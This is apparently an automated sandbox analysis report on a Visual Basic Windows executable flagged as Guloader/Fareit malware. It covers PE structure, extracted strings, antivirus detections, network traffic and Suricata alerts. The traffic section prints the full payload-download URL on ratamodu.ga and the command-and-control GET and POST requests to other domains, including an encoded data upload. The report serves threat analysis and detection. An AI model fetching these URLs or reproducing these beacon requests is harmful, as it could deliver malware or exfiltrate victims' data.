oleaut32.dll.VarDecAdd
oleaut32.dll.VarDecCmp
oleaut32.dll.VarBstrCat
oleaut32.dll.VarCyMulI4
oleaut32.dll.VarBstrCmp
ole32.dll.CoCreateInstanceEx
ole32.dll.CLSIDFromProgIDEx
sxs.dll.SxsOleAut32MapIIDOrCLSIDToTypeLibrary
user32.dll.GetSystemMetrics
user32.dll.MonitorFromWindow
user32.dll.MonitorFromRect
user32.dll.MonitorFromPoint
user32.dll.EnumDisplayMonitors
user32.dll.GetMonitorInfoA
asycfilt.dll.FilterCreateInstance
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
kernel32.dll.NlsGetCacheUpdateCount
version.dll.VerQueryValueA
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
kernel32.dll.GetCalendarInfoW
ws2_32.dll.#23
ws2_32.dll.#21
ws2_32.dll.WSAIoctl
ws2_32.dll.#3
ws2_32.dll.#116
iphlpapi.dll.NotifyIpInterfaceChange
api-ms-win-downlevel-ole32-l1-1-0.dll.CoInitializeEx
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventWrite
api-ms-win-downlevel-ole32-l1-1-0.dll.CoCreateInstance
iphlpapi.dll.GetAdaptersAddresses
iphlpapi.dll.NotifyUnicastIpAddressChange
ws2_32.dll.GetAddrInfoW
oleaut32.dll.#8
oleaut32.dll.#9
oleaut32.dll.DllGetClassObject
oleaut32.dll.DllCanUnloadNow
advapi32.dll.RegOpenKeyW
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
api-ms-win-downlevel-ole32-l1-1-0.dll.StringFromIID
api-ms-win-downlevel-ole32-l1-1-0.dll.CoUninitialize
oleaut32.dll.#500
ws2_32.dll.#5
api-ms-win-downlevel-ole32-l1-1-0.dll.CoSetProxyBlanket
ole32.dll.ObjectStublessClient10
oleaut32.dll.#2
ole32.dll.CoTaskMemFree
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegEnumKeyExW
oleaut32.dll.#6
api-ms-win-downlevel-advapi32-l1-1-0.dll.UnregisterTraceGuids
cryptsp.dll.CryptReleaseContext
"C:\Users\Louise\AppData\Local\Temp\Sri Lank Inquiry Order.pif"

BinGraph Download graph

PE Information

Image Base Entry Point Reported Checksum Actual Checksum Minimum OS Version Compile Time Import Hash Icon Icon Exact Hash Icon Similarity Hash
0x00400000 0x004014c0 0x0001fc67 0x0001fc67 4.0 2011-12-12 20:46:08 776b8356f2fccf1bfac204822980b612 e9e29b011f9c987794720c4dbfb35cc0 1194d1c691076da6673b28511843bbd9

Sections

Name RAW Address Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00001000 0x0000f01c 0x00010000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.79
.data 0x00011000 0x00011000 0x00000e8c 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rsrc 0x00012000 0x00012000 0x000015a0 0x00002000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 3.15

Resources

Name Offset Size Language Sub-language Entropy File type
RT_ICON 0x000123e8 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 4.09 None
RT_ICON 0x000123e8 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 4.09 None
RT_ICON 0x000123e8 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 4.09 None
RT_GROUP_ICON 0x000123b8 0x00000030 LANG_NEUTRAL SUBLANG_NEUTRAL 3.07 None
RT_VERSION 0x00012150 0x00000268 LANG_CATALAN SUBLANG_DEFAULT 3.24 None

Imports

0x401000 None
0x401004 None
0x401008 _CIcos
0x40100c _adj_fptan
0x401010 __vbaVarMove
0x401014 __vbaFreeVar
0x401018 None
0x40101c __vbaStrVarMove
0x401020 __vbaFreeVarList
0x401024 _adj_fdiv_m64
0x401028 None
0x40102c __vbaFreeObjList
0x401030 None
0x401034 _adj_fprem1
0x401038 __vbaStrCat
0x40103c None
0x401040 None
0x401048 None
0x40104c _adj_fdiv_m32
0x401050 None
0x401054 None
0x401058 None
0x40105c __vbaObjSet
0x401060 _adj_fdiv_m16i
0x401064 _adj_fdivr_m16i
0x401068 None
0x40106c None
0x401070 __vbaFpR8
0x401074 _CIsin
0x401078 __vbaChkstk
0x40107c EVENT_SINK_AddRef
0x401080 None
0x401084 __vbaStrCmp
0x401088 __vbaVarTstEq
0x40108c None
0x401090 None
0x401094 None
0x401098 __vbaCastObjVar
0x40109c None
0x4010a0 _adj_fpatan
0x4010a4 None
0x4010a8 EVENT_SINK_Release
0x4010ac __vbaUI1I2
0x4010b0 _CIsqrt
0x4010b8 __vbaExceptHandler
0x4010bc None
0x4010c0 _adj_fprem
0x4010c4 _adj_fdivr_m64
0x4010c8 None
0x4010cc None
0x4010d0 __vbaFPException
0x4010d4 None
0x4010d8 _CIlog
0x4010dc __vbaNew2
0x4010e0 _adj_fdiv_m32i
0x4010e4 _adj_fdivr_m32i
0x4010e8 __vbaStrCopy
0x4010ec __vbaFreeStrList
0x4010f0 None
0x4010f4 _adj_fdivr_m32
0x4010f8 _adj_fdiv_r
0x4010fc None
0x401100 None
0x401104 None
0x401108 None
0x40110c __vbaVarDup
0x401110 None
0x401118 _CIatan
0x40111c __vbaStrMove
0x401120 __vbaUI1Str
0x401124 _allmul
0x401128 None
0x40112c _CItan
0x401130 None
0x401134 _CIexp
0x401138 __vbaFreeStr
0x40113c __vbaFreeObj

!This program cannot be run in DOS mode.
.text
`.data
.rsrc
MSVBVM60.DLL
Vulkanby5
uv3:O
traceabl
Smutte4
"Exif
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
O\mSTXZf
hmq{io
oj>ojtq
I%I$~Y
I+N;?
~oje^
Eu3X[
`O:d_
9>V|}
SE[[{
T.dY.
Q[ky6
ui.ty
x~I4[VY
>|WIk
'q$2-
Yl4H.
8~&|O
2[]\/
=RFy<
Kvi7o
H$_5S
sm#mm
Gc}ukoy
Z+}V%m
wQW.Of
4L;)q
S/yTS
4LS/dHW
4Ll#(M
{`pCQ
.S`pCU
d&TYahW
(_49X
4L(^58
{YAhS
-Il*a4L
;-Il*a4j
4LSOuY
4LSYA(
YA4SN
4L"#4M
49Dd<LS
4LW-Il*a4h
4L*a4N
lAX(a6
W-Il*a4n
4L;YA(W
-Il*a4L
/AlW-qlrv
4LW-k
4}]Zb
4L(e6
;/|l
5C/)4L
WYAhC
/vM +
^Lrv^L
4LB.2L
/lXrv
4L;- G*\P
A_S`0G
(_49pZ
TC/$4L
4LSM'
/;*(g6*"
YAtCT(L
^^N"N1L
4L(e0
4LC7%L
{Ya|S%
;-yl*g4
S-il*e4
4Lrvl
-t\(ft
sd0Lrv
6^IWYd\SM
-IlS'
Hrv^LW
4LS/qd;6
|Ci=L
/qtS-yP;
4LS-yP;
T/d\S-yT
4L;/q4S-yT
lDtSN^D
4LS/q,h^
[L;N%
4Lrvd
4L;N_L
(g6*(
AqW6\
4L(^49
Ms-|T"
<9w-A\
)0GW%
H(_,9DY
S/0FW%
(Y40u'
(21}/
(^4C.
L[YKC/
@QS%KX
(e6ux
*3(~Cy
4L;/dOm
W-gJ;%
(_69F
'OITFAVrv
TY^lC
49[&OI
@AW`w
9Y&OH
(e0}b6
rv^lWN7L
C/14L
\(f0us
(_41]Z
rv;2bZ;2qZ
$&?ed
Kj#Q$
~ZQ/S
._6I%
<Egyu&
[=Yn5H
huKth
k?/t?=:
}t7^e
<Qqmk2
y$k$v
3-tS1
i4=SZ
DRKq/
8Ws=~
y.#o>T
x~I?w
_5[sm
kK]>YW~
Coq,s
U~_)~o
x^7I7,
]I4}/P
x]y_:
333333334
eUUUUW
D9510
%),//
/96-*1H
$,6981)!
MGB?>>ABFL
Smutte4
Check1
Prsupponerer1
GENNEMBOREDES
Option3
uddanne
Option2
Milie
Option1
Line2
Line1
VB5!6&*
Resupplyingp
Vulkanby5
Vulkanby5
Vulkanby5
traceabl
shepindivid
EXTERMENACEA
Tyloseoptimal8
forskrkkem
parso
unexe
TYPEANGIV
Benyttelse
Milie
ophol
THERMOR
uddanne
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
GENNEMBOREDES
Check1
LYNNEDSLAGENE
kneeing
Bottomlessly
Deathcup
CROSSABILITY
kawaka
VISERENDE
Uanvendeliges
BRUGERANGIVNE
OLDFRUER
facsim
Eftergrelse3
VBA6.DLL
__vbaFpR8
__vbaVarMove
__vbaUI1Str
__vbaVarDup
__vbaFreeObjList
__vbaFreeObj
__vbaStrVarMove
__vbaFreeVarList
__vbaVarTstEq
__vbaFreeStr
__vbaStrCopy
__vbaUI1I2
__vbaCastObjVar
__vbaObjSet
__vbaHresultCheckObj
__vbaNew2
__vbaVarLateMemCallLd
__vbaFreeVar
__vbaFreeStrList
__vbaStrCat
__vbaStrMove
__vbaStrCmp
Kystklima
Volstead5
PHTHIRIUS
Solod
Larvicidal
Foruroligelserne5
UNCONTEMPTIBLY
INSTRUKTIONSKURSUS
Vngerne
Tilhrendes4
Dveskolens8
Servicefunktioners5
EKSEKUTION
Diktere1
CHEFDOM
Lornness7
RANVEIG
Forpligtelseserklrings
metea
Irradiate5
Amuck7
BRANIFF
Bestvlede6
reaccelerated
Oinks
surstyle
sammenstds
refractional
TOTALERS
brdstudiers
Merling8
SATANIZE
DONNER
Driftsikkert6
Plastiskes9
VENSTRELINEAER
Skovhugsterne1
Heautomorphism1
Whoreishly
Bryggerkedels9
tH9=
tj9=
ty9=
@tp9=
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaVarMove
__vbaFreeVar
__vbaStrVarMove
__vbaFreeVarList
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaObjSet
_adj_fdiv_m16i
_adj_fdivr_m16i
__vbaFpR8
_CIsin
__vbaChkstk
EVENT_SINK_AddRef
__vbaStrCmp
__vbaVarTstEq
__vbaCastObjVar
_adj_fpatan
EVENT_SINK_Release
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaExceptHandler
_adj_fprem
_adj_fdivr_m64
__vbaFPException
_CIlog
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarDup
__vbaVarLateMemCallLd
_CIatan
__vbaStrMove
__vbaUI1Str
_allmul
_CItan
_CIexp
__vbaFreeStr
__vbaFreeObj
D9510
%),//
/96-*1H
$,6981)!
MGB?>>ABFL
eUUUUW
333333334
/ P6pL
,/KPip
L3kOpEkLYZppyTY9i0RZwqFI8r197
Spiralsnoet6
somatological
annelides
Jurata
Sejrvindings
Upshoot3
KOMMUNALBESTYRELSE
aflvningerne
CONTAINMENT
CANCANENS
KATJES
medicean
FLERRIED
OLIGIST
Coatninger
Fodterapeuters
startbogstavs
Caponized9
Blokfljternes
TALVRDIEN
harpist
:20:2
Tuberculomas
Polydaemonist5
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040304B0
LegalCopyright
Internal
LegalTrademarks
Internal
ProductName
Vulkanby5
FileVersion
ProductVersion
InternalName
Resupplyingp
OriginalFilename
Resupplyingp.exe
/ P6pL
,/KPip

Full Results

Engine Signature Engine Signature Engine Signature
Bkav Clean MicroWorld-eScan Clean CMC Clean
CAT-QuickHeal Clean McAfee Fareit-FST!3F2FD6C7F273 Cylance Unsafe
Zillya Clean SUPERAntiSpyware Clean Sangfor Malware
K7AntiVirus Clean Alibaba Clean K7GW Clean
CrowdStrike Clean Invincea Clean Baidu Clean
F-Prot W32/VBKrypt.AMM.gen!Eldorado Symantec Clean TotalDefense Clean
APEX Malicious Avast Clean ClamAV Clean
Kaspersky UDS:DangerousObject.Multi.Generic BitDefender Clean NANO-Antivirus Clean
Paloalto generic.ml AegisLab Clean Tencent Clean
Endgame malicious (high confidence) Sophos Clean Comodo Clean
F-Secure Clean DrWeb Clean VIPRE Clean
TrendMicro Clean McAfee-GW-Edition Clean Fortinet W32/Agent.HKMB!tr
Trapmine malicious.high.ml.score FireEye Clean Emsisoft Clean
Ikarus Clean Cyren W32/VBKrypt.AMM.gen!Eldorado Jiangmin Clean
Webroot Clean Avira Clean MAX Clean
Antiy-AVL Clean Kingsoft Clean Arcabit Clean
ViRobot Trojan.Win32.Guloader.81920.G ZoneAlarm UDS:DangerousObject.Multi.Generic Avast-Mobile Clean
Microsoft PWS:Win32/Fareit.AB!MTB AhnLab-V3 Clean Acronis Clean
BitDefenderTheta Gen:[email protected] ALYac Clean TACHYON Clean
VBA32 Clean Malwarebytes Trojan.MalPack.VB Zoner Clean
ESET-NOD32 a variant of Win32/Injector.EMGX TrendMicro-HouseCall Clean Rising Downloader.Guloader!1.C738 (CLASSIC)
Yandex Clean SentinelOne DFI - Suspicious PE eGambit Unsafe.AI_Score_100%
GData Clean Ad-Aware Clean AVG Clean
Cybereason Clean Panda Clean Qihoo-360 Clean
Sorry! No behavior.

Hosts

Direct IP Country Name
Y 23.211.5.239 [VT] Netherlands
N 84.38.181.216 [VT] Russian Federation
Y 8.8.8.8 [VT] United States
Y 72.21.91.29 [VT] United States
Y 52.114.128.43 [VT] United States
N 23.227.38.64 [VT] Canada
Y 184.51.9.166 [VT] United States
N 184.168.221.40 [VT] United States
Y 172.217.16.142 [VT] United States
Y 1.1.1.1 [VT] Australia

TCP

Source Source Port Destination Destination Port
192.168.1.6 49185 13.107.42.23 443
192.168.1.6 49187 13.107.42.23 443
192.168.1.6 49207 144.208.213.45 80
192.168.1.6 49205 172.217.23.99 443
192.168.1.6 22122 184.168.221.40 www.barsoum.dentist 21558
192.168.1.6 14381 184.168.221.40 www.barsoum.dentist 12614
192.168.1.6 25455 184.168.221.40 www.barsoum.dentist 30799
192.168.1.6 31350 184.168.221.40 www.barsoum.dentist 20552
192.168.1.6 17495 184.168.221.40 www.barsoum.dentist 17734
192.168.1.6 13898 184.168.221.40 www.barsoum.dentist 13665
192.168.1.6 22073 184.168.221.40 www.barsoum.dentist 26672
192.168.1.6 28022 184.168.221.40 www.barsoum.dentist 20790
192.168.1.6 22645 184.168.221.40 www.barsoum.dentist 14196
192.168.1.6 12401 184.168.221.40 www.barsoum.dentist 19832
192.168.1.6 10339 184.168.221.40 www.barsoum.dentist 25671
192.168.1.6 21364 184.168.221.40 www.barsoum.dentist 26233
192.168.1.6 27205 184.168.221.40 www.barsoum.dentist 26219
192.168.1.6 30265 184.168.221.40 www.barsoum.dentist 17990
192.168.1.6 25166 184.168.221.40 www.barsoum.dentist 25419
192.168.1.6 29545 184.168.221.40 www.barsoum.dentist 29266
192.168.1.6 18551 184.168.221.40 www.barsoum.dentist 20546
192.168.1.6 19551 184.168.221.40 www.barsoum.dentist 26712
192.168.1.6 30313 184.168.221.40 www.barsoum.dentist 25935
192.168.1.6 13901 184.168.221.40 www.barsoum.dentist 14456
192.168.1.6 26993 184.168.221.40 www.barsoum.dentist 16735
192.168.1.6 17012 184.168.221.40 www.barsoum.dentist 27241
192.168.1.6 19789 184.168.221.40 www.barsoum.dentist 29007
192.168.1.6 12596 184.168.221.40 www.barsoum.dentist 28517
192.168.1.6 20787 184.168.221.40 www.barsoum.dentist 26694
192.168.1.6 16746 184.168.221.40 www.barsoum.dentist 19543
192.168.1.6 18790 184.168.221.40 www.barsoum.dentist 19798
192.168.1.6 22885 184.168.221.40 www.barsoum.dentist 26701
192.168.1.6 27731 184.168.221.40 www.barsoum.dentist 21621
192.168.1.6 28758 184.168.221.40 www.barsoum.dentist 12921
192.168.1.6 30288 184.168.221.40 www.barsoum.dentist 29281
192.168.1.6 19764 184.168.221.40 www.barsoum.dentist 20592
192.168.1.6 21603 184.168.221.40 www.barsoum.dentist 13676
192.168.1.6 14695 184.168.221.40 www.barsoum.dentist 23139
192.168.1.6 29816 184.168.221.40 www.barsoum.dentist 30053
192.168.1.6 17491 184.168.221.40 www.barsoum.dentist 29801
192.168.1.6 29542 184.168.221.40 www.barsoum.dentist 22599
192.168.1.6 14200 184.168.221.40 www.barsoum.dentist 20309
192.168.1.6 49210 184.168.221.40 www.barsoum.dentist 80
192.168.1.6 49211 184.168.221.40 www.barsoum.dentist 80
192.168.1.6 49193 184.51.9.166 443
192.168.1.6 49189 20.36.252.129 443
192.168.1.6 49204 23.227.38.64 www.thetoptitle.com 80
192.168.1.6 49212 52.114.128.43 443
192.168.1.6 37482 52.114.132.20 14329
192.168.1.6 9072 52.114.132.20 42974
192.168.1.6 55419 52.114.132.20 7980
192.168.1.6 49191 72.21.91.29 80
192.168.1.6 49213 72.21.91.29 80
192.168.1.6 49190 8.248.135.254 80
192.168.1.6 49202 84.38.181.216 ratamodu.ga 80
23.211.5.239 443 192.168.1.6 49194

UDP

Source Source Port Destination Destination Port
192.168.1.6 60922 1.1.1.1 53
192.168.1.6 63713 1.1.1.1 53
192.168.1.6 64201 1.1.1.1 53
192.168.1.6 64426 1.1.1.1 53
192.168.1.6 137 192.168.1.255 137
192.168.1.6 137 192.168.1.8 137
192.168.1.6 49918 8.8.8.8 53
192.168.1.6 50574 8.8.8.8 53
192.168.1.6 50764 8.8.8.8 53
192.168.1.6 50797 8.8.8.8 53
192.168.1.6 52348 8.8.8.8 53
192.168.1.6 52555 8.8.8.8 53
192.168.1.6 54129 8.8.8.8 53
192.168.1.6 56219 8.8.8.8 53
192.168.1.6 56304 8.8.8.8 53
192.168.1.6 57593 8.8.8.8 53
192.168.1.6 57781 8.8.8.8 53
192.168.1.6 58697 8.8.8.8 53
192.168.1.6 60016 8.8.8.8 53
192.168.1.6 60164 8.8.8.8 53
192.168.1.6 60486 8.8.8.8 53
192.168.1.6 60922 8.8.8.8 53
192.168.1.6 62653 8.8.8.8 53
192.168.1.6 63241 8.8.8.8 53
192.168.1.6 63576 8.8.8.8 53
192.168.1.6 63713 8.8.8.8 53
192.168.1.6 64201 8.8.8.8 53
192.168.1.6 64426 8.8.8.8 53
192.168.1.6 65048 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
ratamodu.ga [VT] A 84.38.181.216 [VT] 84.38.181.216 [VT]
www.mums-in.net [VT] NXDOMAIN
www.thetoptitle.com [VT] A 23.227.38.64 [VT] 23.227.38.64 [VT]
www.outdoorbusters.info [VT]
www.jqrsky.com [VT]
www.pbrgen.com [VT]
www.barsoum.dentist [VT] A 184.168.221.40 [VT] 184.168.221.34 [VT]
www.sixouyo.com [VT]

HTTP Requests

URI Data
http://ratamodu.ga/~zadmin/group/apsfb_BwRMswJ149.bin
GET /~zadmin/group/apsfb_BwRMswJ149.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: ratamodu.ga
Cache-Control: no-cache

http://www.thetoptitle.com/c216/?lxldz=Nnqh7TNKIIDcqdzGNwugJZtqnGWTOdvJypW6t/M5WntLNAJT3RrvH7SpKhfW7prI&Tj=YBZ4
GET /c216/?lxldz=Nnqh7TNKIIDcqdzGNwugJZtqnGWTOdvJypW6t/M5WntLNAJT3RrvH7SpKhfW7prI&Tj=YBZ4 HTTP/1.1
Host: www.thetoptitle.com
Connection: close

http://www.barsoum.dentist/c216/?lxldz=qDsuE3Dsv2OzkxyZUeXZwGu6bH8qaHXOomLR5n8tK0jzX5EyijM1plB0iZv+jWrr&Tj=YBZ4&sql=1
GET /c216/?lxldz=qDsuE3Dsv2OzkxyZUeXZwGu6bH8qaHXOomLR5n8tK0jzX5EyijM1plB0iZv+jWrr&Tj=YBZ4&sql=1 HTTP/1.1
Host: www.barsoum.dentist
Connection: close

http://www.barsoum.dentist/c216/
POST /c216/ HTTP/1.1
Host: www.barsoum.dentist
Connection: close
Content-Length: 81931
Cache-Control: no-cache
Origin: http://www.barsoum.dentist
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.barsoum.dentist/c216/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

lxldz=ihgUaTvu~1a3~xqrH-S4gzqVfEsbVGnLwCe5x1UPMWzGQKcrlTRV63cA(vDWvHPUZEFZ4t(USvndKvS2lDrp5uyGqk1u1AL99qoJTgyYxJ08TFVWmtfJLzOcujtDXmK2B47fHVLf2bBWawddQKCr2ZVjOZ9FiG8zs00o4-czVzFd8mxrjdUPR6GZgOpHJAZMnWzcMIFSxkiNgF2Fix7Donkx90u-e5ap(WB7WeJfRFYKx_UBgjv_QpaYjRIjLZ4wgK06Qx1K3dZvkLxXf19trUnCmM8NrgB5DlGot404LCYjO7b4XF6jDEiR6YwdhG6A2PZjie~pUsYKnT~QNNqUxTGQOfkesWXPOgYScgz9CEkyv2tiLz6zZB(IZBm09jXq~pYElqStUnlpPBr0LuJ0iP(qmUTU5sRzzjPddfTexLCEFioaNp~Fn1KOrXbWsOOIRUAVGaCPB5fDtDp5r_SSb4lLjcIMBEvC2NIY08TU(Oafm3BKZZPHua05Iek9s6MMMO2ZsIcK(UHcOGa2bfu4KfdIfGNuEVJoRZPKFZhDL_Y5Fnqfz01gKFGjBOnThvSV9zcDP8g9lAV49LZAAnuDNuzk~caA8nI1tsPxxrhegOvsoeIhFSgKTjqSdV4wABKpL8PvaBctBJMOanTdIX9zyZKMdMaYdiEc2hSf(nnWebTyOv1FQSa8Bc7b0tXSrmTLMINWd5u4XUBGz1g1mjykc3rfV-PpCbS6kukpqQOV0_POrY3TBApwFKvGCaFRoMiXXkO8vJ9uEvsKrW74OcMwjqzu~Baz68YlHIafsEOZx0EiMBU1WXLZOKVMq2(GCV77jqM4bwlhl-4e988DjZGf5LVWuVVNJbdcgLaDYLVnpHBnr3e-rIlDqiaHn68LFJJuWZVPb-NJ68FCRCBQ4doEemRBxbCe(6iWj2~jYBH23FVidNwavxWpPTwXb10-G0MVYStHwwgz3F1Wg5vOcs1SZsYDTK1B2ayjykieCo6TPHdDAZnnksXUlYGBy89Qr_INcixq

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

Source Destination ICMP Type Data
192.168.1.6 1.1.1.1 3
192.168.1.6 8.8.8.8 3
192.168.1.6 8.8.8.8 3

CIF Results

No CIF Results

Suricata Alerts

Timestamp Source IP Source Port Destination IP Destination Port Protocol GID SID REV Signature Category Severity
2020-06-05 14:09:05.129 192.168.1.6 [VT] 49185 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:09:05.130 192.168.1.6 [VT] 49184 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:09:05.707 192.168.1.6 [VT] 49188 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:09:05.707 192.168.1.6 [VT] 49186 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:09:05.707 192.168.1.6 [VT] 49187 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:09:13.890 192.168.1.6 [VT] 49193 184.51.9.166 [VT] 443 TCP 1 2028388 2 ET JA3 Hash - Possible Malware - RigEK Unknown Traffic 3
2020-06-05 14:09:19.013 192.168.1.6 [VT] 49194 184.51.9.166 [VT] 443 TCP 1 2028388 2 ET JA3 Hash - Possible Malware - RigEK Unknown Traffic 3
2020-06-05 14:09:25.611 192.168.1.6 [VT] 52555 8.8.8.8 [VT] 53 UDP 1 2025105 3 ET INFO DNS Query for Suspicious .ga Domain Potentially Bad Traffic 2
2020-06-05 14:10:19.588 192.168.1.6 [VT] 49203 20.36.252.129 [VT] 443 TCP 1 2028388 2 ET JA3 Hash - Possible Malware - RigEK Unknown Traffic 3
2020-06-05 14:10:48.196 192.168.1.6 [VT] 49205 172.217.23.99 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:12:18.016 144.208.213.45 [VT] 80 192.168.1.6 [VT] 49207 TCP 1 2018959 4 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation 1
2020-06-05 14:12:18.016 144.208.213.45 [VT] 80 192.168.1.6 [VT] 49207 TCP 1 2014520 7 ET INFO EXE - Served Attached HTTP Misc activity 3

Suricata TLS

Timestamp Source IP Source Port Destination IP Destination Port Subject Issuer Fingerprint Version
2020-06-05 14:09:05.706 192.168.1.6 [VT] 49185 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:09:05.707 192.168.1.6 [VT] 49184 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:09:05.708 192.168.1.6 [VT] 49188 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:09:05.708 192.168.1.6 [VT] 49187 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:09:05.713 192.168.1.6 [VT] 49186 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:09:07.806 192.168.1.6 [VT] 49189 20.36.252.129 [VT] 443 CN=g.msn.com 84:07:33:ed:86:d5:52:e5:ff:20:cd:89:1e:0a:3c:00:7b:68:0d:17 TLS 1.2
2020-06-05 14:09:11.888 192.168.1.6 [VT] 49192 184.51.9.166 [VT] 443 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=*.sfx.ms 43:5a:ab:ca:cc:ab:86:4d:56:81:18:e3:e5:17:05:9b:0e:32:8c:38 TLS 1.2
2020-06-05 14:09:13.964 192.168.1.6 [VT] 49193 184.51.9.166 [VT] 443 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=*.sfx.ms 43:5a:ab:ca:cc:ab:86:4d:56:81:18:e3:e5:17:05:9b:0e:32:8c:38 TLSv1
2020-06-05 14:09:19.016 192.168.1.6 [VT] 49194 184.51.9.166 [VT] 443 TLSv1
2020-06-05 14:10:19.753 192.168.1.6 [VT] 49203 20.36.252.129 [VT] 443 CN=g.msn.com 84:07:33:ed:86:d5:52:e5:ff:20:cd:89:1e:0a:3c:00:7b:68:0d:17 TLSv1
2020-06-05 14:10:48.196 192.168.1.6 [VT] 49205 172.217.23.99 [VT] 443 C=US, ST=California, L=Mountain View, O=Google LLC, CN=upload.video.google.com ea:2f:e9:4b:45:d4:c2:92:9d:3c:2f:d8:42:92:08:68:20:bd:86:ad TLS 1.2
2020-06-05 14:11:03.627 192.168.1.6 [VT] 49208 52.114.132.20 [VT] 443 CN=*.events.data.microsoft.com 1a:c2:39:ff:84:fe:1a:c9:81:f5:45:9a:d0:a0:f2:66:d1:8c:38:c9 TLS 1.2
2020-06-05 14:12:07.178 192.168.1.6 [VT] 49212 52.114.128.43 [VT] 443 CN=*.events.data.microsoft.com 1a:c2:39:ff:84:fe:1a:c9:81:f5:45:9a:d0:a0:f2:66:d1:8c:38:c9 TLS 1.2

Suricata HTTP

Timestamp Source IP Source Port Destination IP Destination Port Method Status Hostname URI Content Type User Agent Referrer Length
2020-06-05 14:09:09.545 192.168.1.6 [VT] 49190 8.248.135.254 [VT] 80 200 ctldl.windowsupdate.com [VT] /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?c05362e6e894290d application/vnd.ms-cab-compressed Microsoft-CryptoAPI/6.1 None 6894
2020-06-05 14:09:10.652 192.168.1.6 [VT] 49191 72.21.91.29 [VT] 80 200 ocsp.digicert.com [VT] /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D application/ocsp-response Microsoft-CryptoAPI/6.1 None 1507
2020-06-05 14:09:13.059 192.168.1.6 [VT] 49191 72.21.91.29 [VT] 80 200 ocsp.digicert.com [VT] /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D application/ocsp-response Microsoft-CryptoAPI/6.1 None 1507
2020-06-05 14:09:27.124 192.168.1.6 [VT] 49202 84.38.181.216 [VT] 80 200 ratamodu.ga [VT] /~zadmin/group/apsfb_BwRMswJ149.bin application/octet-stream Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko None 172096
